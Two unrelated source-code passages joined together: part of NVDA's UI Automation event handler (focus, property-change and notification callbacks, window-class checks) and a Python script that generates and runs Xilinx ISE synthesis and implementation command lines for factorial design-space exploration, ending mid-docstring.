		if window and not eventHandler.shouldAcceptEvent("gainFocus",windowHandle=window):
			return
		obj=NVDAObjects.UIA.UIA(UIAElement=sender)
		if not obj or not obj.shouldAllowUIAFocusEvent:
			return
		eventHandler.queueEvent("gainFocus",obj)
	def IUIAutomationPropertyChangedEventHandler_HandlePropertyChangedEvent(self,sender,propertyId,newValue):
		"""COM callback: translate a UIA property change into an NVDA event
		(per UIAPropertyIdsToNVDAEventNames) and queue it, after filtering.
		"""
		# #3867: For now manually force this VARIANT type to empty to get around a nasty double free in comtypes/ctypes.
		# We also don't use the value in this callback.
		newValue.vt=VT_EMPTY
		if not self.MTAThreadInitEvent.isSet():
			# UIAHandler hasn't finished initialising yet, so just ignore this event.
			return
		NVDAEventName=UIAPropertyIdsToNVDAEventNames.get(propertyId,None)
		if not NVDAEventName:
			return
		if not self.isNativeUIAElement(sender):
			return
		window=self.getNearestWindowHandle(sender)
		if window and not eventHandler.shouldAcceptEvent(NVDAEventName,windowHandle=window):
			return
		import NVDAObjects.UIA
		obj=NVDAObjects.UIA.UIA(UIAElement=sender)
		if not obj:
			return
		# Re-use the existing focus object when the event targets the focus.
		focus=api.getFocusObject()
		if obj==focus:
			obj=focus
		eventHandler.queueEvent(NVDAEventName,obj)
	def IUIAutomationNotificationEventHandler_HandleNotificationEvent(self,sender,NotificationKind,NotificationProcessing,displayString,activityId):
		"""COM callback (IUIAutomation5+): queue a UIA_notification NVDA event
		carrying the notification kind, processing hint, display string and activity id.
		"""
		if not self.MTAThreadInitEvent.isSet():
			# UIAHandler hasn't finished initialising yet, so just ignore this event.
			return
		import NVDAObjects.UIA
		obj=NVDAObjects.UIA.UIA(UIAElement=sender)
		if not obj:
			# Sometimes notification events can be fired on a UIAElement that has no windowHandle and does not connect through parents back to the desktop.
			# There is nothing we can do with these.
			return
		eventHandler.queueEvent("UIA_notification",obj, notificationKind=NotificationKind, notificationProcessing=NotificationProcessing, displayString=displayString, activityId=activityId)
	def _isUIAWindowHelper(self,hwnd):
		"""Uncached decision of whether NVDA should use UIA for the given window.
		Combines the good/bad class-name lists, appModule overrides, and the
		window's own UiaHasServerSideProvider answer. Returns a bool.
		"""
		# UIA in NVDA's process freezes in Windows 7 and below
		processID=winUser.getWindowThreadProcessID(hwnd)[0]
		if windll.kernel32.GetCurrentProcessId()==processID:
			return False
		import NVDAObjects.window
		windowClass=NVDAObjects.window.Window.normalizeWindowClassName(winUser.getClassName(hwnd))
		# For certain window classes, we always want to use UIA.
		if windowClass in goodUIAWindowClassNames:
			return True
		# allow the appModule for the window to also choose if this window is good
		# An appModule should be able to override bad UIA class names as prescribed by core
		appModule=appModuleHandler.getAppModuleFromProcessID(processID)
		if appModule and appModule.isGoodUIAWindow(hwnd):
			return True
		# There are certain window classes that just had bad UIA implementations
		if windowClass in badUIAWindowClassNames:
			return False
		if windowClass=="NetUIHWND":
			parentHwnd=winUser.getAncestor(hwnd,winUser.GA_ROOT)
			# #2816: Outlook 2010 auto complete does not fire enough UIA events, IAccessible is better.
			# #4056: Combo boxes in Office 2010 Options dialogs don't expose a name via UIA, but do via MSAA.
			if winUser.getClassName(parentHwnd) in {"Net UI Tool Window","NUIDialog"}:
				return False
		# allow the appModule for the window to also choose if this window is bad
		if appModule and appModule.isBadUIAWindow(hwnd):
			return False
		# Ask the window if it supports UIA natively
		res=windll.UIAutomationCore.UiaHasServerSideProvider(hwnd)
		if res:
			# the window does support UIA natively, but
			# Microsoft Word should not use UIA unless we can't inject or the user explicitly chose to use UIA with Microsoft word
			if windowClass=="_WwG" and not (config.conf['UIA']['useInMSWordWhenAvailable'] or not appModule.helperLocalBindingHandle):
				return False
		return bool(res)
	def isUIAWindow(self,hwnd):
		"""Cached wrapper around _isUIAWindowHelper; entries expire after 0.5s."""
		now=time.time()
		v=self.UIAWindowHandleCache.get(hwnd,None)
		if not v or (now-v[1])>0.5:
			v=self._isUIAWindowHelper(hwnd),now
			self.UIAWindowHandleCache[hwnd]=v
		return v[0]
	def getNearestWindowHandle(self,UIAElement):
		"""Walk up from UIAElement to the nearest element with a native window
		handle and return that handle (or None). The result is cached on the
		element object itself as _nearestWindowHandle.
		"""
		if hasattr(UIAElement,"_nearestWindowHandle"):
			# Called previously. Use cached result.
			return UIAElement._nearestWindowHandle
		try:
			processID=UIAElement.cachedProcessID
		except COMError:
			return None
		appModule=appModuleHandler.getAppModuleFromProcessID(processID)
		# WDAG (Windows Defender application Guard) UIA elements should be treated as being from a remote machine, and therefore their window handles are completely invalid on this machine.
		# Therefore, jump all the way up to the root of the WDAG process and use that window handle as it is local to this machine.
		if appModule.appName==WDAG_PROCESS_NAME:
			condition=UIAUtils.createUIAMultiPropertyCondition({UIA_ClassNamePropertyId:[u'ApplicationFrameWindow',u'CabinetWClass']})
			walker=self.clientObject.createTreeWalker(condition)
		else:
			# Not WDAG, just walk up to the nearest valid windowHandle
			walker=self.windowTreeWalker
		try:
			new=walker.NormalizeElementBuildCache(UIAElement,self.windowCacheRequest)
		except COMError:
			return None
		try:
			window=new.cachedNativeWindowHandle
		except COMError:
			window=None
		# Cache for future use to improve performance.
		UIAElement._nearestWindowHandle=window
		return window
	def isNativeUIAElement(self,UIAElement):
		"""Return True if NVDA should handle this element via UIA: it must come
		from another process and belong to a window for which isUIAWindow is
		True (with a special case for the IE 9 downloads list).
		"""
		#Due to issues dealing with UIA elements coming from the same process, we do not class these UIA elements as usable.
		#It seems to be safe enough to retreave the cached processID, but using tree walkers or fetching other properties causes a freeze.
		try:
			# NOTE(review): spelled cachedProcessId here but cachedProcessID in
			# getNearestWindowHandle -- presumably both resolve via comtypes'
			# case-insensitive attribute lookup; confirm.
			processID=UIAElement.cachedProcessId
		except COMError:
			return False
		if processID==windll.kernel32.GetCurrentProcessId():
			return False
		# Whether this is a native element depends on whether its window natively supports UIA.
		windowHandle=self.getNearestWindowHandle(UIAElement)
		if windowHandle:
			if self.isUIAWindow(windowHandle):
				return True
			if winUser.getClassName(windowHandle)=="DirectUIHWND" and "IEFRAME.dll" in UIAElement.cachedProviderDescription and UIAElement.currentClassName in ("DownloadBox", "accessiblebutton", "DUIToolbarButton", "PushButton"):
				# This is the IE 9 downloads list.
				# #3354: UiaHasServerSideProvider returns false for the IE 9 downloads list window,
				# so we'd normally use MSAA for this control.
				# However, its MSAA implementation is broken (fires invalid events) if UIA is initialised,
				# whereas its UIA implementation works correctly.
				# Therefore, we must use UIA here.
				return True
		return False
|
Implement_Xil.py | # A tool implementing full/fractional factorial design for Xilinx ISE design Suite
# Launch format: python Implement_Xil.py config.xml
# where config.xml - custom configuration of DSE flow
# Author: Ilya Tuzov, Universitat Politecnica de Valencia
import sys
import xml.etree.ElementTree as ET
import re
import os
import datetime
import subprocess
import shutil
import string
import copy
import time
from multiprocessing import Process, Manager
from multiprocessing.managers import BaseManager
import glob
from subprocess import call
from sys import platform
class Table:
    """Simple column-oriented table with CSV and XML serialisation.

    Data is stored as a list of columns (each a list of cell values) plus a
    parallel list of column labels. Cells are normally strings; to_xml()
    requires string cells.
    """
    def __init__(self, name):
        self.name = name        # table name, used in diagnostic messages
        self.columns = []       # list of columns; each column is a list of cells
        self.labels = []        # column headers, parallel to self.columns

    def rownum(self):
        """Return the number of rows (length of the first column, 0 if none)."""
        if self.columns:
            return len(self.columns[0])
        return 0

    def colnum(self):
        """Return the number of columns."""
        return len(self.columns)

    def add_column(self, lbl):
        """Append an empty column labelled *lbl*."""
        self.columns.append([])
        self.labels.append(lbl)

    def add_row(self, idata=None):
        """Append a row.

        :param idata: list with one value per column, or None to append a
                      row of empty strings. A size mismatch is reported and
                      the row is dropped.
        """
        if idata is not None:
            if len(idata) == self.colnum():
                for c, column in enumerate(self.columns):
                    column.append(idata[c])
            else:
                # print(single-arg) works identically on Python 2 and 3.
                print("Warning: Building Table - line size mismatch at add_row(): " + str(len(idata)) + " <> " + str(self.colnum()))
        else:
            for column in self.columns:
                column.append("")

    def put(self, row, col, data):
        """Store *data* into cell (row, col); warn on out-of-range indexes."""
        if col < len(self.columns):
            if row < len(self.columns[0]):
                self.columns[col][row] = data
            else:
                print("Table: " + self.name + " : put data: " + str(data) + " : Row index " + str(row) + " not defined")
        else:
            print("Table: " + self.name + " : put data: " + str(data) + " : Column index " + str(col) + " not defined")

    def get(self, row, col):
        """Return cell (row, col), or "" (after a warning) when out of range.

        BUG FIX: the original error messages referenced an undefined name
        `data` (copy-pasted from put()), raising NameError on the error path.
        """
        if col < len(self.columns):
            if row < len(self.columns[col]):
                return self.columns[col][row]
            print("Table: " + self.name + " : get: Row index " + str(row) + " not defined")
        else:
            print("Table: " + self.name + " : get: Column index " + str(col) + " not defined")
        return ""

    def to_csv(self):
        """Serialise the table as semicolon-separated CSV (with a sep=; header)."""
        res = "sep=;\n"
        for l in self.labels:
            res += l + ";"
        nc = len(self.columns)
        # Robustness: an empty table (no columns) now serialises to just the header.
        nr = len(self.columns[0]) if self.columns else 0
        for r in range(nr):
            res += "\n"
            for c in range(nc):
                res += str(self.get(r, c)) + ";"
        return res

    def to_xml(self, tagname='Item'):
        """Serialise the table as XML, one *tagname* element per row with one
        attribute per column. Cell values must be strings."""
        res = "<?xml version=\"1.0\"?>\n<data>\n"
        for r in range(self.rownum()):
            res += '\n\n<' + tagname
            for c in range(self.colnum()):
                res += '\n\t' + self.labels[c] + '=\"' + self.get(r, c) + '\"'
            res += '/>'
        res += "\n</data>"
        return res

    def snormalize(self, ist):
        """Strip a trailing "\\r" or "\\n" element from list *ist*, in place.

        Fixed: no longer raises IndexError when *ist* is empty.
        """
        if ist and (ist[-1] == "\r" or ist[-1] == "\n"):
            del ist[-1]
        return ist

    def build_from_csv(self, fname):
        """Populate the table from a CSV file whose first line declares the
        separator (e.g. "sep=;") and whose second line holds the labels."""
        fdesc = open(fname, 'r')
        content = fdesc.read()
        fdesc.close()
        # str.split works on both Python 2 and 3 (string.split was Python-2-only).
        lines = content.split('\n')
        itemsep = re.findall("sep\s*?=\s*?([;,]+)", lines[0])[0]
        labels = self.snormalize(lines[1].rstrip(itemsep).split(itemsep))
        for l in labels:
            self.add_column(l)
        for i in range(2, len(lines)):
            c = self.snormalize(lines[i].rstrip(itemsep).split(itemsep))
            self.add_row(c)
#------------------------------------------------------------------------------------
class IOption:
    """A single tool option: a name (e.g. power, opt_mode) paired with its
    value (e.g. No/Yes, Speed/Area)."""
    def __init__(self, name, value=""):
        self.name = name      # option name: power, opt_mode, ...
        self.value = value    # option value: No/Yes, Speed/Area, ...
class IFactor:
    """Maps an experiment factor (X1..X31) onto a tool option of a given
    implementation phase, recording the option value for each factor value."""
    def __init__(self, ifactor_name, ioption_name="", iphase=""):
        self.factor_name = ifactor_name    # X1....X31
        self.option_name = ioption_name    # power, opt_mode
        self.phase = iphase                # synthesis/translate/map/par
        self.option_values = dict()        # factor value -> option value (e.g. Speed)

    def add_setting(self, ifactor_value, ioption_value):
        """Record that factor value *ifactor_value* selects option value *ioption_value*."""
        self.option_values[ifactor_value] = ioption_value

    def to_string(self):
        """Return a human-readable dump of the factor and its settings."""
        parts = ["Factor: " + self.factor_name + "\tOption: " + self.option_name + "\tPhase: " + self.phase]
        for key, val in self.option_values.items():
            parts.append("\n\t" + str(key) + " : " + str(val))
        return "".join(parts)
class IFactorialConfiguration:
    """One configuration of the factorial design: the per-phase tool options
    (synthesis/translate/map/par) plus the log/report file names derived from
    the generic configuration, and generators for the ISE command-line scripts.

    Fix: the two error diagnostics used Python-2-only `print` statements; they
    now use the print(...) call form already used elsewhere in this file,
    which behaves identically on Python 2 and 3 for a single argument.
    """
    def __init__(self, ilabel):
        self.label = ilabel
        self.synthesis = []     # list of IOption for the synthesis (xst) phase
        self.translate = []     # list of IOption for ngdbuild
        self.map = []           # list of IOption for map
        self.par = []           # list of IOption for par
        self.genconf = None     # GenericConfig; must be set before build_log_desc()
        #-------------------
        self.factor_setting = []
        self.table_index = int(-1)
        # Log/report paths; filled in by build_log_desc().
        self.synthesis_log = None
        self.translate_log = None
        self.map_log = None
        self.par_log = None
        self.synthesis_netlist_log = None
        self.map_netlist_log = None
        self.par_netlist_log = None
        self.trace_report = None
        self.es_power_report = None
        self.saif_power_report = None

    def to_string(self):
        """Return a human-readable dump of all per-phase options."""
        res = "Options Confugiration: " + self.label
        res += "\n\tSynthesis:"
        for c in self.synthesis:
            res += "\n\t\t" + c.name + " = " + c.value
        res += "\n\tTranslate:"
        for c in self.translate:
            res += "\n\t\t" + c.name + " = " + c.value
        res += "\n\tMAP:"
        for c in self.map:
            res += "\n\t\t" + c.name + " = " + c.value
        res += "\n\tPAR:"
        for c in self.par:
            res += "\n\t\t" + c.name + " = " + c.value
        return res

    def mcopy(self, ilabel):
        """Return a deep copy of this configuration under a new label.
        genconf is shared (not copied) and the log paths are rebuilt."""
        res = IFactorialConfiguration(ilabel)
        res.synthesis = copy.deepcopy(self.synthesis)
        res.translate = copy.deepcopy(self.translate)
        res.map = copy.deepcopy(self.map)
        res.par = copy.deepcopy(self.par)
        res.genconf = self.genconf
        res.build_log_desc()
        return res

    def build_log_desc(self):
        """Derive all log/report file names from self.genconf (must be set)."""
        self.synthesis_log = self.genconf.log_dir + "/_synthesis.log"
        self.translate_log = self.genconf.log_dir + "/_translate.log"
        self.map_log = self.genconf.log_dir + "/_map.log"
        self.par_log = self.genconf.log_dir + "/_par.log"
        self.synthesis_netlist_log = self.genconf.log_dir + "/_post_synt_netlist.log"
        self.map_netlist_log = self.genconf.log_dir + "/_map_netlist_log.log"
        self.par_netlist_log = self.genconf.log_dir + "/_par_netlist_log.log"
        self.fuse_log = self.genconf.log_dir + "/" + "fuse_log.log"
        self.isim_log = self.genconf.log_dir + "/" + "isim_log.log"
        self.trace_report = self.genconf.log_dir + "/" + "timing.twr"
        self.es_power_report = self.genconf.log_dir + "/estimated_power_" + self.genconf.top_design_unit + ".pwr"
        self.saif_power_report = self.genconf.log_dir + "/SAIF_" + self.genconf.top_design_unit + ".pwr"

    def get_option_by_name(self, iname, iphase):
        """Return the IOption named *iname* in phase *iphase*
        (synthesis/translate/map/par), or None when not present.
        NOTE(review): an unknown phase prints an error and exits with status 0
        (kept for backward compatibility; a non-zero status would be more conventional).
        """
        if iphase == "synthesis":
            for c in self.synthesis:
                if c.name == iname:
                    return c
        elif iphase == "translate":
            for c in self.translate:
                if c.name == iname:
                    return c
        elif iphase == "map":
            for c in self.map:
                if c.name == iname:
                    return c
        elif iphase == "par":
            for c in self.par:
                if c.name == iname:
                    return c
        else:
            print("Error: get_option_by_name: \"" + iphase + "\" phase not found")
            sys.exit(0)
        return None

    def get_xst_file_name(self):
        """Name of the xst command file for this design."""
        return self.genconf.top_design_unit + ".xst"

    def get_xst_file_content(self):
        """Content of the xst command file: a run command with one -name value
        line per synthesis option."""
        res = "\nrun"
        for c in self.synthesis:
            res += "\n-" + c.name + " " + c.value
        return res + "\n"

    def get_synthesis_script(self):
        """Shell command line for the synthesis (xst) phase."""
        res = "xst -intstyle " + self.genconf.intstyle + " -ifn \"./" + self.get_xst_file_name() + "\" -ofn \"" + self.genconf.log_dir + "/" + self.genconf.top_design_unit + ".syr\" > " + self.synthesis_log
        return res

    def get_translate_script(self):
        """Shell command line for the translate (ngdbuild) phase.
        Option-value markers: '!-' suppresses the option entirely,
        '!+' suppresses only the value part."""
        res = "ngdbuild "
        for c in self.translate:
            if c.value.find('!-') < 0:
                if c.name.replace(' ', '').replace('\t', '') != "":
                    res += " -" + c.name
                    if c.value.find('!+') < 0: res += " " + c.value
                else:
                    res += " " + c.value
        res += " > " + self.translate_log
        return res

    def get_map_script(self):
        """Shell command line for the map phase (same '!-'/'!+' markers as translate)."""
        res = "map "
        for c in self.map:
            if c.value.find('!-') < 0:
                if c.name.replace(' ', '').replace('\t', '') != "":
                    res += " -" + c.name
                    if c.value.find('!+') < 0: res += " " + c.value
                else:
                    res += " " + c.value
        res += " > " + self.map_log
        return res

    def get_par_script(self):
        """Shell command line for the par phase; uses the configured ISE
        install path when available (same '!-'/'!+' markers as translate)."""
        if self.genconf.ise_path != "":
            res = os.path.join(self.genconf.ise_path, 'ISE/bin/nt64/par.exe') + " -w "
        else:
            res = "par -w "
        for c in self.par:
            if c.value.find('!-') < 0:
                if c.name.replace(' ', '').replace('\t', '') != "":
                    res += " -" + c.name
                    if c.value.find('!+') < 0: res += " " + c.value
                else:
                    res += " " + c.value
        res += " > " + self.par_log
        return res

    #phase = synthesis / map / par
    def get_netgen_script(self, phase):
        """Shell command line to export a simulation netlist after *phase*."""
        res = "netgen -intstyle " + self.genconf.intstyle + " " + self.genconf.basic_netgen_options
        if phase == "synthesis":
            res += "-dir " + self.genconf.netlist_dir + "/synthesis " + "-sim " + self.genconf.top_design_unit + ".ngc " + "_synthesis.vhd > " + self.synthesis_netlist_log
#            res += "-dir " + self.genconf.netlist_dir + "/synthesis " + "-sim " + self.genconf.top_design_unit + ".ngc " + "_synthesis.v > " + self.synthesis_netlist_log
        elif phase == "map":
            res += "-dir " + self.genconf.netlist_dir + "/map " + "-pcf " + self.genconf.top_design_unit + ".pcf " + "-sim " + self.genconf.top_design_unit + "_map.ncd " + "_map.vhd > " + self.map_netlist_log
#            res += "-dir " + self.genconf.netlist_dir + "/map " + "-pcf " + self.genconf.top_design_unit + ".pcf " + "-sim " + self.genconf.top_design_unit + "_map.ncd " + "_map.v > " + self.map_netlist_log
        elif phase == "par":
            res += "-dir " + self.genconf.netlist_dir + "/par " + "-pcf " + self.genconf.top_design_unit + ".pcf" + " -tb" + " -insert_pp_buffers true " + "-sim " + self.genconf.top_design_unit + ".ncd " + "_timesim.vhd > " + self.par_netlist_log
#            res += "-dir " + self.genconf.netlist_dir + "/par " + "-pcf " + self.genconf.top_design_unit + ".pcf" + " -tb" + " -insert_pp_buffers true " + "-sim " + self.genconf.top_design_unit + ".ncd " + "_timesim.v > " + self.par_netlist_log
        else:
            print("get_netgen_script: undefined phase " + phase)
        return res

    def get_trace_script(self):
        """Shell command line for static timing analysis (trce)."""
        res = "trce -intstyle " + self.genconf.intstyle + " -v 3 -n 3 -s " + self.genconf.speed_grade + " -fastpaths -xml " + self.genconf.top_design_unit + ".twx " + self.genconf.top_design_unit + ".ncd -o " + self.trace_report + " " + self.genconf.top_design_unit + ".pcf" + " -ucf " + self.genconf.constraint_file + " > " + self.genconf.log_dir + "/trace.log"
        return res

    def get_es_power_script(self):
        """Shell command line for estimated power analysis (xpwr)."""
        res = "xpwr -intstyle " + self.genconf.intstyle + " " + self.genconf.top_design_unit + ".ncd " + self.genconf.top_design_unit + ".pcf" + " -o " + self.es_power_report + " > " + self.genconf.log_dir + "/xpower_log.log"
        return res
class IFactorialDesign:
    """Container for the IFactorialConfiguration objects of one experiment."""
    def __init__(self):
        # configurations under study (IFactorialConfiguration instances)
        self.configurations = []

    def append_configuration(self, config):
        """Add *config* to the design."""
        self.configurations.append(config)

    def get_by_label(self, label):
        """Return the configuration whose label equals *label*, or None."""
        for cfg in self.configurations:
            if cfg.label == label:
                return cfg
        return None

    def to_string(self):
        """Return a full human-readable dump: each configuration's xst file
        content plus every generated tool command line."""
        pieces = ["\n\t\t\tCONFIGURATIONS"]
        for cfg in self.configurations:
            pieces.append("\n\n\n\tLABEL: " + cfg.label)
            pieces.append("\n" + cfg.get_xst_file_content())
            pieces.append("\nSynthesis_script: " + cfg.get_synthesis_script())
            pieces.append("\nTranslate_script: " + cfg.get_translate_script())
            pieces.append("\nMap_script: " + cfg.get_map_script())
            pieces.append("\nPar_script: " + cfg.get_par_script())
            pieces.append("\nNetgen_Synt_script: " + cfg.get_netgen_script("synthesis"))
            pieces.append("\nNetgen_Map_script: " + cfg.get_netgen_script("map"))
            pieces.append("\nNetgen_Par_script: " + cfg.get_netgen_script("par"))
            pieces.append("\nTrace_script: " + cfg.get_trace_script())
        return "".join(pieces)
class GenericConfig:
    """Design-wide (configuration-independent) settings of the DSE flow:
    device/tool parameters, directory layout, clock/constraint data and
    simulation settings. Optionally populated from a <generic> XML tag.

    Fix: to_string() dumped generic_constraint_file twice and never dumped
    testbench_file (copy-paste error); the duplicate now reports testbench_file.
    """
    def __init__(self, itag=None):
        """Initialise every field to an empty/zero default; when *itag* (an
        xml.etree Element) is given, overwrite them from its attributes."""
        self.ise_path = ""
        self.device = ""
        self.speed_grade = ""
        self.top_design_unit = ""
        self.intstyle = ""
        self.ifn = ""
        self.constraint_file = ""
        self.clk_net = ""
        self.rst_net = ""
        self.clk_initial_period = 0.0
        self.clk_adjustment_delta = 0.0
        self.design_label = ""
        self.relative_path = ""
        self.design_dir = ""
        self.template_dir = ""
        self.log_dir = ""
        self.netlist_dir = ""
        self.basic_netgen_options = ""
        self.rpw_tpw = ""
        self.generic_constraint_file = ""
        self.generic_constraint_content = ""
        self.tool_log_dir = ""
        self.testbench_template_file = ""
        self.sim_project_file = ""
        self.testbench_file = ""
        self.testbench_top_unit = ""
        self.clk_constant = ""
        self.uut_root = ""
        self.std_start_time = float(0.0)
        self.std_observation_time = float(0.0)
        self.std_clock_period = float(0.0)
        self.isim_gui = ""
        self.waveform_file = ""
        self.statfile = "XIStat.xml"
        if itag is not None:
            self.build_from_xml(itag)

    def build_from_xml(self, itag):
        """Populate the fields from the attributes of XML element *itag*.
        NOTE(review): missing numeric attributes would make float(None) raise
        TypeError -- presumably all attributes are mandatory in config.xml; confirm.
        """
        self.ise_path = itag.get('ise_path')
        self.device = itag.get('device')
        self.speed_grade = itag.get('speed_grade')
        self.top_design_unit = itag.get('top_design_unit')
        self.intstyle = itag.get('intstyle')
        self.ifn = itag.get('ifn')
        self.constraint_file = self.top_design_unit + ".ucf"
        self.clk_net = itag.get('clk_net')
        self.rst_net = itag.get('rst_net')
        self.clk_initial_period = float(itag.get('clk_initial_period'))
        self.clk_adjustment_delta = float(itag.get('clk_adjustment_delta'))
        self.design_label = itag.get('design_label')
        self.relative_path = itag.get('relative_path')
        self.design_dir = itag.get('design_dir')
        self.template_dir = itag.get('template_dir')
        self.log_dir = itag.get('log_dir')
        self.netlist_dir = itag.get('netlist_dir')
        self.basic_netgen_options = itag.get('basic_netgen_options')
        self.rpw_tpw = itag.get('rpw_tpw')
        self.generic_constraint_file = itag.get('generic_constraint_file')
        self.testbench_template_file = itag.get('testbench_template_file')
        self.sim_project_file = itag.get('sim_project_file')
        self.testbench_file = itag.get('testbench_file')
        self.testbench_top_unit = itag.get('testbench_top_unit')
        self.clk_constant = itag.get('clk_constant')
        self.uut_root = itag.get('uut_root')
        self.std_start_time = float(itag.get('std_start_time'))
        self.std_observation_time = float(itag.get('std_observation_time'))
        self.std_clock_period = float(itag.get('std_clock_period'))
        self.isim_gui = itag.get('isim_gui')
        self.waveform_file = itag.get('waveform_file')

    def to_string(self):
        """Return a human-readable dump of the configuration."""
        res = "Generic Configuration: "
        res += "\n\tise_path: " + self.ise_path
        res += "\n\tdevice: " + self.device
        res += "\n\tspeed_grade: " + self.speed_grade
        res += "\n\ttop_design_unit: " + self.top_design_unit
        res += "\n\tintstyle: " + self.intstyle
        res += "\n\tifn: " + self.ifn
        res += "\n\tconstraint_file: " + self.constraint_file
        res += "\n\tclk_net: " + self.clk_net
        res += "\n\trst_net: " + self.rst_net
        res += "\n\tclk_initial_period: " + str(self.clk_initial_period)
        res += "\n\tclk_adjustment_delta: " + str(self.clk_adjustment_delta)
        res += "\n\tdesign_label: " + self.design_label
        res += "\n\trelative_path: " + self.relative_path
        res += "\n\tdesign_dir: " + self.design_dir
        res += "\n\ttemplate_dir: " + self.template_dir
        res += "\n\tlog_dir: " + self.log_dir
        res += "\n\tnetlist_dir: " + self.netlist_dir
        res += "\n\tbasic_netgen_options: " + self.basic_netgen_options
        res += "\n\trpw_tpw: " + self.rpw_tpw
        res += "\n\tgeneric_constraint_file: " + self.generic_constraint_file
        res += "\n\ttestbench_template_file: " + self.testbench_template_file
        res += "\n\tsim_project_file: " + self.sim_project_file
        # BUG FIX: this line previously repeated generic_constraint_file.
        res += "\n\ttestbench_file: " + self.testbench_file
        res += "\n\ttestbench_top_unit: " + self.testbench_top_unit
        res += "\n\tclk_constant: " + self.clk_constant
        res += "\n\tuut_root: " + self.uut_root
        res += "\n\tstd_start_time: " + str(self.std_start_time)
        res += "\n\tstd_observation_time: " + str(self.std_observation_time)
        res += "\n\tstd_clock_period: " + str(self.std_clock_period)
        res += "\nisim_gui: " + str(self.isim_gui)
        res += "\nwaveform_file: " + str(self.waveform_file)
        return res
class IoptionConfigurator:
    """Builds the set of ISE tool-option configurations for a partial
    factorial design experiment from the XML configuration tree."""
    def __init__(self):
        self.config_table = None #Table: factor settings, one row per configuration
        self.factors = [] #IFactor: factor-name -> tool-option mappings
        self.res_design = None # resulting IFactorialDesign, built by create_design
        self.genconf = None # GenericConfig parsed from the <generic> tag
    def get_factor_by_name(self, fc_name):
        # Linear search over the parsed factors; returns None when absent.
        for c in self.factors:
            if(c.factor_name == fc_name):
                return(c)
        return(None)
    def create_design(self, croot):
        """Build the factorial design from XML root `croot`.

        Expects <generic>, <default_*_options> and <factorial_design>
        sections.  Produces one configuration per row of the factor table
        plus the default configuration, logs them to
        <tool_log_dir>/_Configurations.log, and returns the design.
        NOTE(review): assumes cwd is the project root when composing
        absolute paths -- confirm against the caller.
        """
        self.genconf = GenericConfig(croot.findall('generic')[0])
        print self.genconf.to_string()
        # Load the shared constraint text once; it is appended to every
        # generated *.ucf later in the flow.
        if(self.genconf.generic_constraint_file != ""):
            f = open(os.path.join(self.genconf.design_dir, self.genconf.template_dir, self.genconf.generic_constraint_file), 'r')
            self.genconf.generic_constraint_content = f.read()
            f.close()
            print "Generic Constraints: " + self.genconf.generic_constraint_content
        # Absolute paths for tool logging and the statistics file
        self.genconf.tool_log_dir = os.path.join(os.getcwd(), self.genconf.design_dir, "Logs")
        self.genconf.statfile = os.path.join(os.getcwd(), self.genconf.design_dir, self.genconf.statfile)
        if(not os.path.exists(self.genconf.tool_log_dir)):
            os.mkdir(self.genconf.tool_log_dir)
        mlog = open(os.path.join(self.genconf.tool_log_dir, "_Configurations.log"),'w')
        #read the defaults
        default_configuration = IFactorialConfiguration(self.genconf.design_label+"Default")
        default_configuration.genconf = self.genconf
        o_synthesis = croot.findall('default_synthesis_options')[0].findall('option')
        o_translate = croot.findall('default_translate_options')[0].findall('option')
        o_map = croot.findall('default_map_options')[0].findall('option')
        o_par = croot.findall('default_par_options')[0].findall('option')
        for opt in o_synthesis:
            default_configuration.synthesis.append(IOption(opt.get('name'), opt.get('value')))
        for opt in o_translate:
            default_configuration.translate.append(IOption(opt.get('name'), opt.get('value')))
        for opt in o_map:
            default_configuration.map.append(IOption(opt.get('name'), opt.get('value')))
        for opt in o_par:
            default_configuration.par.append(IOption(opt.get('name'), opt.get('value')))
        # Mandatory options derived from the generic config (device, file names);
        # an option named ' ' carries positional command-line arguments.
        o_device = IOption('p', self.genconf.device)
        default_configuration.synthesis.append(o_device)
        default_configuration.synthesis.append(IOption('ifn', self.genconf.ifn))
        default_configuration.synthesis.append(IOption('ofn', self.genconf.top_design_unit))
        default_configuration.synthesis.append(IOption('top', self.genconf.top_design_unit))
        default_configuration.translate.insert(0,IOption('intstyle', self.genconf.intstyle))
        default_configuration.translate.append(IOption('uc', self.genconf.constraint_file))
        default_configuration.translate.append(o_device)
        default_configuration.translate.append(IOption(' ', self.genconf.top_design_unit + ".ngc " + self.genconf.top_design_unit + ".ngd"))
        default_configuration.map.insert(0,IOption('intstyle', self.genconf.intstyle))
        default_configuration.map.append(o_device)
        default_configuration.map.append(IOption('o', self.genconf.top_design_unit + "_map.ncd " + self.genconf.top_design_unit + ".ngd " + self.genconf.top_design_unit + ".pcf"))
        default_configuration.par.insert(0,IOption('intstyle', self.genconf.intstyle))
        default_configuration.par.append(IOption(' ', self.genconf.top_design_unit + "_map.ncd " + self.genconf.top_design_unit + ".ncd " + self.genconf.top_design_unit + ".pcf"))
        default_configuration.build_log_desc()
        print default_configuration.to_string()
        factor_setting = croot.findall('factorial_design')[0]
        #read the Table of factors setting
        self.config_table = Table("Partial Factorial Design/Configurations")
        self.config_table.build_from_csv(factor_setting.get('table_of_factors'))
        print self.config_table.to_csv()
        #read factors assignment
        fset = factor_setting.findall('factor')
        for tag in fset:
            fc = IFactor(tag.get('name'), tag.get('option'), tag.get('phase'))
            set_tag = tag.findall('setting')
            for x in set_tag:
                fc.add_setting(x.get('factor_value'), x.get('option_value'))
            self.factors.append(fc)
        for i in self.factors:
            print i.to_string()
        #Build configurations
        self.res_design = IFactorialDesign()
        self.res_design.append_configuration(default_configuration)
        # One configuration per table row: copy the default, then override the
        # option bound to each factor with the row's factor setting.
        for i in range(0, self.config_table.rownum(), 1):
            conf = default_configuration.mcopy(self.genconf.design_label + str("%03d" % i))
            conf.table_index = i
            conf.factor_setting = []
            for c in range(0, self.config_table.colnum(), 1):
                x_name = self.config_table.labels[c]
                x_value = self.config_table.get(i, c)
                x_factor = self.get_factor_by_name(x_name)
                conf.factor_setting.append(x_value)
                if(x_factor == None):
                    # A table column with no matching <factor> tag is fatal
                    print "Error: not found in the configuration file *.xml: Factor " + x_name
                    sys.exit(0)
                x_option = conf.get_option_by_name(x_factor.option_name, x_factor.phase)
                x_option.value = x_factor.option_values[x_value]
            self.res_design.append_configuration(conf)
        mlog.write(self.res_design.to_string())
        mlog.close()
        return(self.res_design)
def execute_impl_script(script, res_logfile, retry_attempts, comment, ilog, check_file = ""):
    """Run a tool command line through the shell, retrying on reported errors.

    :param script: shell command line to execute (run with shell=True)
    :param res_logfile: log/report file the tool must produce; scanned for 'ERROR:'
    :param retry_attempts: number of extra attempts allowed after a failure
    :param comment: human-readable phase name used in log messages
    :param ilog: open writable log file for progress messages
    :param check_file: optional artifact that must exist after a successful run
